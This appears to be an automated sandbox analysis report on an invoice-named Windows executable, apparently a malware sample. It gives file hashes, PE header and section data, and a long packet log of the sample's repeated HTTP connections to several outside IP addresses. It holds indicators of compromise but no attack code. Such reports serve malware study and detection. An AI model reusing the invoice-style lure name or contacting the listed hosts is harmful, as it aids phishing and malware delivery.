                                                                                                                            File name:Invoice_&_SOA_ready_for_dispatch.exe
                                                                                                                            File size:965'632 bytes
                                                                                                                            MD5:eea9bf4a16ab377328a59bde0a0c76df
                                                                                                                            SHA1:d6015abe7bd2ac246af5656410c7f7c7dc5f5637
                                                                                                                            SHA256:fd2ac4af2e4d90f117a8ba49d77cc480f0ad6a8a6cfa7479384d68ce27939f1a
                                                                                                                            SHA512:ca360f0d3572e09ca8f737af9137dd44ae0e1cdba25065876bc20fbd92463f1dd532d30e1c008af56dbc6f664107f688f9397ce4a7a75af3dc3bb5c1728b6ba5
                                                                                                                            SSDEEP:24576:6JOiQEUDJiJMHCxRCilWY+G348OYyVDWLr3IFE:6RaFKdLWYjECH3I
                                                                                                                            TLSH:C82512E5321BA863D5F808FD0511408167F0B0AA3842F3ED6D96B8EE79C7BD24B565CB
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c.Me................................. ........@.. ....................... ............@................................
                                                                                                                            Icon Hash:90cececece8e8eb0
                                                                                                                            Entrypoint:0x4ed002
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x654DA063 [Fri Nov 10 03:15:47 2023 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:4
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:4
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:4
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                            Instruction
                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xecfa8 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xee000 | 0x5fc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xeb008 | 0xeb200 | False | 0.932915711390218 | data | 7.937047832644545 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xee000 | 0x5fc | 0x600 | False | 0.4401041666666667 | data | 4.161409298913876 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf0000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xee0a0 | 0x3a8 | data | | | 0.4155982905982906
RT_MANIFEST | 0xee448 | 0x1b4 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators | | | 0.5642201834862385

DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                            Nov 10, 2023 09:27:48.808900118 CET804971623.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:48.808979988 CET4971680192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:49.532341957 CET4971680192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:50.562339067 CET4971780192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:50.715975046 CET804971723.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:50.716085911 CET4971780192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:50.716406107 CET4971780192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:50.869008064 CET804971723.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:50.869034052 CET804971723.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:51.133230925 CET804971723.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:51.133271933 CET804971723.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:51.133285046 CET804971723.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:51.133299112 CET804971723.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:51.133311033 CET804971723.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:51.133429050 CET4971780192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:51.133456945 CET4971780192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:51.133461952 CET804971723.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:51.133531094 CET4971780192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:52.220259905 CET4971780192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:53.235866070 CET4971880192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:53.388351917 CET804971823.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:53.388469934 CET4971880192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:53.388838053 CET4971880192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:53.541204929 CET804971823.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:53.617281914 CET804971823.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:53.617347002 CET804971823.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:53.617383957 CET804971823.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:53.617458105 CET4971880192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:53.617760897 CET804971823.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:53.617856979 CET4971880192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:53.617950916 CET4971880192.168.2.1023.227.38.74
                                                                                                                            Nov 10, 2023 09:27:53.770258904 CET804971823.227.38.74192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:59.339667082 CET4971980192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:27:59.646331072 CET804971991.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:59.646446943 CET4971980192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:27:59.646814108 CET4971980192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:27:59.953897953 CET804971991.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:59.953918934 CET804971991.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:59.954125881 CET4971980192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:01.157303095 CET4971980192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:02.173470974 CET4972080192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:02.480637074 CET804972091.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:02.480907917 CET4972080192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:02.481271982 CET4972080192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:02.789205074 CET804972091.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:02.789237976 CET804972091.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:02.789371967 CET4972080192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:03.986037970 CET4972080192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:05.001790047 CET4972280192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:05.306581020 CET804972291.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:05.306775093 CET4972280192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:05.310724020 CET4972280192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:05.615365028 CET804972291.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:05.615788937 CET804972291.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:05.615803957 CET804972291.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:05.615844965 CET4972280192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:06.813596010 CET4972280192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:07.829838991 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.134253979 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.134418011 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.134658098 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.479257107 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494031906 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494050026 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494061947 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494076014 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494088888 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494131088 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.494167089 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.494168997 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494184017 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494195938 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494209051 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494220972 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.494220972 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.494256020 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.494282007 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.798624992 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798654079 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798669100 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798681974 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798696995 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798708916 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798708916 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.798728943 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.798737049 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798755884 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798769951 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798772097 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.798804998 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798810005 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.798820972 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798834085 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798847914 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:08.798847914 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.798875093 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.798971891 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:08.799149990 CET4972380192.168.2.1091.195.240.123
                                                                                                                            Nov 10, 2023 09:28:09.103380919 CET804972391.195.240.123192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:15.184653044 CET4972480192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:15.380403996 CET804972484.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:15.380573988 CET4972480192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:15.448548079 CET4972480192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:15.644114971 CET804972484.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:15.644188881 CET804972484.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:17.970448971 CET4972580192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:18.166167021 CET804972584.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:18.166328907 CET4972580192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:18.175122976 CET4972580192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:18.371335983 CET804972584.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:18.371519089 CET804972584.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:20.704658031 CET4972680192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:20.900512934 CET804972684.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:20.900778055 CET4972680192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:20.903774977 CET4972680192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:21.099773884 CET804972684.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:21.099842072 CET804972684.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.423567057 CET4972780192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:23.619235039 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.619472027 CET4972780192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:23.619740963 CET4972780192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:23.815361023 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815479040 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815623999 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815680981 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815720081 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815751076 CET4972780192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:23.815761089 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815783024 CET4972780192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:23.815800905 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815839052 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815872908 CET4972780192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:23.815876961 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815913916 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:23.815924883 CET4972780192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:23.815972090 CET4972780192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:23.816148043 CET4972780192.168.2.1084.32.84.32
                                                                                                                            Nov 10, 2023 09:28:24.011737108 CET804972784.32.84.32192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:28.992280960 CET4972880192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:29.144360065 CET8049728199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:29.144541025 CET4972880192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:29.144850016 CET4972880192.168.2.10199.59.243.225
                                                                                                                            Nov 10, 2023 09:28:29.296765089 CET8049728199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:29.418311119 CET8049728199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:29.418328047 CET8049728199.59.243.225192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:32.513824940 CET4974580192.168.2.1035.227.246.104
                                                                                                                            Nov 10, 2023 09:29:32.666207075 CET804974535.227.246.104192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:32.805963993 CET804974535.227.246.104192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:32.806021929 CET804974535.227.246.104192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:32.806160927 CET4974580192.168.2.1035.227.246.104
                                                                                                                            Nov 10, 2023 09:29:34.016654015 CET4974580192.168.2.1035.227.246.104
                                                                                                                            Nov 10, 2023 09:29:35.032660007 CET4974680192.168.2.1035.227.246.104
                                                                                                                            Nov 10, 2023 09:29:35.185017109 CET804974635.227.246.104192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:35.185223103 CET4974680192.168.2.1035.227.246.104
                                                                                                                            Nov 10, 2023 09:29:35.185496092 CET4974680192.168.2.1035.227.246.104
                                                                                                                            Nov 10, 2023 09:29:35.337438107 CET804974635.227.246.104192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:35.337465048 CET804974635.227.246.104192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:35.478204966 CET804974635.227.246.104192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:35.478354931 CET804974635.227.246.104192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:35.478527069 CET4974680192.168.2.1035.227.246.104
                                                                                                                            Nov 10, 2023 09:29:36.688553095 CET4974680192.168.2.1035.227.246.104
                                                                                                                            Nov 10, 2023 09:29:37.704957008 CET4974780192.168.2.1035.227.246.104
                                                                                                                            Nov 10, 2023 09:29:37.857208967 CET804974735.227.246.104192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:37.857362986 CET4974780192.168.2.1035.227.246.104
                                                                                                                            Nov 10, 2023 09:29:37.858119965 CET4974780192.168.2.1035.227.246.104
                                                                                                                            Nov 10, 2023 09:29:38.010263920 CET804974735.227.246.104192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:38.157619953 CET804974735.227.246.104192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:38.157659054 CET804974735.227.246.104192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:38.157677889 CET804974735.227.246.104192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:38.157699108 CET804974735.227.246.104192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:38.157821894 CET4974780192.168.2.1035.227.246.104
                                                                                                                            Nov 10, 2023 09:29:38.165056944 CET804974735.227.246.104192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:38.165117025 CET804974735.227.246.104192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:38.165133953 CET804974735.227.246.104192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:38.165220022 CET4974780192.168.2.1035.227.246.104
                                                                                                                            Nov 10, 2023 09:29:38.165220022 CET4974780192.168.2.1035.227.246.104
                                                                                                                            Nov 10, 2023 09:29:38.165371895 CET4974780192.168.2.1035.227.246.104
                                                                                                                            Nov 10, 2023 09:29:38.317827940 CET804974735.227.246.104192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:43.939263105 CET4974880192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:44.246038914 CET804974891.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:44.246201038 CET4974880192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:44.246426105 CET4974880192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:44.553551912 CET804974891.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:44.553600073 CET804974891.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:44.553782940 CET4974880192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:45.750999928 CET4974880192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:46.767663956 CET4974980192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:47.081444025 CET804974991.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:47.082045078 CET4974980192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:47.082045078 CET4974980192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:47.396713018 CET804974991.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:47.396750927 CET804974991.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:47.396796942 CET4974980192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:48.594707966 CET4974980192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:49.611552954 CET4975080192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:49.918441057 CET804975091.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:49.918576956 CET4975080192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:49.918850899 CET4975080192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:50.225799084 CET804975091.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:50.226386070 CET804975091.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:50.226454020 CET804975091.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:50.226552010 CET4975080192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:51.424386024 CET4975080192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:52.439064980 CET4975180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:52.753087997 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:52.753184080 CET4975180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:52.753489017 CET4975180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:53.108055115 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.124485970 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.124547958 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.124567986 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.124588966 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.124608040 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.124659061 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.124702930 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.124716997 CET4975180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:53.124716997 CET4975180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:53.124761105 CET4975180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:53.124771118 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.124792099 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.124855995 CET4975180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:53.124866962 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.124927998 CET4975180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:53.438736916 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.438802004 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.438843012 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.438885927 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.438884020 CET4975180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:53.438930988 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.438971043 CET4975180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:53.438976049 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.439019918 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.439028025 CET4975180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:53.439059019 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.439097881 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.439107895 CET4975180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:53.439136028 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.439176083 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.439196110 CET4975180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:53.439214945 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.439254045 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:53.439260006 CET4975180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:53.439374924 CET4975180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:53.439533949 CET4975180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:29:53.754384041 CET804975191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:58.455892086 CET4975280192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:29:58.804198980 CET8049752168.76.252.99192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:58.804308891 CET4975280192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:29:58.805006027 CET4975280192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:29:59.154952049 CET8049752168.76.252.99192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:59.155067921 CET4975280192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:30:01.603509903 CET4975280192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:30:02.610764027 CET4975380192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:30:02.966270924 CET8049753168.76.252.99192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:02.966403008 CET4975380192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:30:02.966656923 CET4975380192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:30:03.322711945 CET8049753168.76.252.99192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:03.322870016 CET4975380192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:30:04.469861984 CET4975380192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:30:05.485872984 CET4975480192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:30:05.841427088 CET8049754168.76.252.99192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:05.841681957 CET4975480192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:30:05.842101097 CET4975480192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:30:06.197455883 CET8049754168.76.252.99192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:06.197726965 CET8049754168.76.252.99192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:06.197830915 CET4975480192.168.2.10168.76.252.99
